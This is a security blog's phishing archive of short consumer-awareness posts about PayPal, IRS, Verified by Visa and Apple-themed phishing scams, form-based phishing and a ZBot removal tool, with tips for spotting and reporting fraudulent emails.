The Security Pub

Random Thoughts About Security

Category Archives: Phishing

Phishing Scams are on the Rise

“Phishing” is where fraudsters send spam or pop-up messages to lure recipients into volunteering personal, financial or credential-related information from unsuspecting victims. That information can then be used to commit identity theft, or enter password-protected sites using your account. As phishing schemes become more sophisticated, it becomes increasingly important to be vigilant.

Learn more about how to spot a bogus phishing message, the important steps you can take to avoid getting “hooked,” and what to do if you’ve mistakenly responded to a phishing email with your personal information.

[box type="info"]The “Dos, Don’ts and Nevers” of Phishing

  1. DO Delete suspicious messages immediately.
  2. DON’T click on any links in the message.
  3. Instead, DO copy and paste the URL into a new browser window.
  4. NEVER respond to an unsolicited email, or supply personal information as requested by an email, even if the message looks real.
  5. NEVER supply your passwords or other sensitive information via an email message. No legitimate organization should request your password or other types of sensitive information via an email message.[/box]

What to do if you’re compromised

If you believe you might have inadvertently revealed sensitive information such as your password, you should change your password immediately.

If you provided personal financial accounts information that could be used for identity theft or fraud in response to a fraudulent e-mail claiming to be sent by outside agencies, you should immediately contact the company being spoofed.

Paypal Phishing Has Gone Multilingual

A recent report compiled by OpenDNS showed that 45 percent of all phishing attempts made in 2010 were targeting PayPal customers.

It is no wonder then that we witness PayPal phishing attempts on an almost daily basis. The latest one – spotted by Avira – comes in two flavors: English and French.

The e-mail itself is practically identical – the only difference is that in the English version takes the victim to the phishing page via a link, and the French version employs a button. Even the reference number cited in the e-mail is the same.

The e-mail also contains security tips that if followed it would thwart the phishers’ plans. I guess they thought the inclusion would make the e-mail look more legitimate and decided to bet on the fact that many people simply ignore such advice and follow the offered link/button.

Form Based Phishing Attacks are on the RISE

As always, spammers are keeping abreast with the important events of the season’s, and know that January is when the public usually submits tax returns and starts getting refunds. Websense is reporting that the form-based approach is being used more frequently than the usual direct links to phishing sites.

What are form-based email attacks?

Form-based attacks is just another type of phishing attack.  Instead of using a link to take the user to a phishing site, the hacker includes a form that the user is asked to complete. When the user completes the form and submits it, the details are then sent to the attacker. Here is a short video that shows an example.

ZBot Removal Tool

ZBot (also known as Zeus, ZeusBot or WSNPoem, Gorhax and Kneber) is a Trojan created to steal sensitive information from compromised computers.  Zbot focuses mainly on online backing information, that unsuspected users would enter in to access the financial organizations website, however it also monitoring system information to obtain additional authentication credentials.  Some of the newer variants are doing even more now.  They are gathering visited website history and other data the user enters in online, while at the same time it is taking screen shots.

To help with this BitDefender has created a ZBot Removal Tool which checks users’ computers, detects and eliminates most of the ZBot variants spotted in the wild.

Unsolicited Email Could Be A Potential Phishing Scam

phishingThis being tax season, I would like to remind you to remain cautious when receiving unsolicited emails due to the possibility that these emails could be a potential phishing scam. Phishing scams may appear as a tax refund, an offer to assist in filing for a refund or possibly contain details about fake e-file websites. These email messages may appear to be from the IRS, directly asking users for personal information, contain a link that instructs the user to follow to a website requesting personal information and/or contains harmful computer code.

  • NOTE: All IRS web page addresses begin with http://www.irs.gov. Phishing emails will have an address other than that, an example might be http://ww4.irs.gov.
  • I encourage you to take the following measures to protect yourself from phishing scams:
    • Do not follow unsolicited web links in email messages. Clicking a link in a phishing email typically takes you to a fake website. The phishing site is designed to look like the company’s real website.
    • If you receive a suspicious email I recommend you simply delete it.
    • Look for signs of security. Real corporate websites use secure, encrypted web pages any time their customers are asked to send personal and financial information over the internet. Look for https:// in the web address. The “s” stands for “secure”. Also, look for a locked padlock icon in the lower part of your browser window. The locked padlock icon indicates the site is encrypted, which means your data is protected when you send it over the Internet. If you don’t see these signs, then the site could be a scam.

Here is a link to the IRS website that will answer some questions regarding phishing scams and how the IRS is working to help prevent you being the next victim.

Verified by Visa Phishing Scam

You should use some caution if you get an email asking you to join Verified by Visa over the next few weeks. Taking advantage of the holiday rush to shop online, the public awareness of the Verified by Visa brand, and the security it offers, criminals are pushing a Phishing scam that offers very little in the way of true protection.

Verified by Visa is a solid layer of security for your Visa card. It works alongside the fraud detection and purchase protection offered by the issuing bank. What happens is you register for it online during the checkout process for a participating Verified by Visa retailer. You enter the required information, create a password, and activate the Verified by Visa service. Once activated, you cannot use the Visa card online without the password. If you want to know more, the official FAQ for Verified by Visa related information is here.

According to Webroot, a new Phishing campaign is circulating that is targeting holiday shoppers online using the Verified by Visa service name to lend creditability to the scam. This fake offer starts with an email inviting you to join the Verified by Visa program. From there you are linked to a Phishing site that is “clearly more professional, slick, and clean than most Phishing pages,” “The form’s businesslike appearance serves to reassure the victim that the page really belongs to Visa.”

If you see this invitation, two things will stand out that are sure to ring warning bells. The first thing is the address used. While the email text will list one address, the actual address used in one example is vbvactivation-visa.com. This is not a legit Visa address.

Also, when registering for the Verified by Visa service, as mentioned, you do so during the check out process at a participating retailer. Visa would never send you random emails asking you to join. Another issue with the domain is that it uses HTTP and not HTTPS in the address. If you are dealing with Visa, and they need any type of information, they will always use HTTPS in the address field.

The second thing to scream fake and keep those warning bells ringing is that you are being asked for all kinds of personal information.

“In a real sign-up form for Verified by Visa, you won’t be asked to provide your mother’s maiden name, social security number, birthdates’, or any other sensitive details that you wouldn’t otherwise enter into a Web-based order form while shopping online,”.

It was also discovered that the domain used in the Phishing attack was registered to a GMail account.

If you see emails that ask you to join the Verified by Visa program, forward them to phishing@visa.com and delete them. Under no circumstances should you follow links or open any attachments with them.

If by chance you get an email that claims to come from the bank that issued your Visa card, pick up the phone and call the bank, and give them nothing over email. The odds are this too is a scam, and the bank will know immediately.

New Mac Phishing Attack

An email which purports to relate to a recent Apple retail transaction and asks for details of any recent orders is out there. The email also carries a stuffed file. This contains an ‘exe’ file which will only launch on a Windows machine. The email reads: “We recorded a payment request from ‘Apple Inc.’ to enable the charge of $7,548.45 on your account.”

Read the full article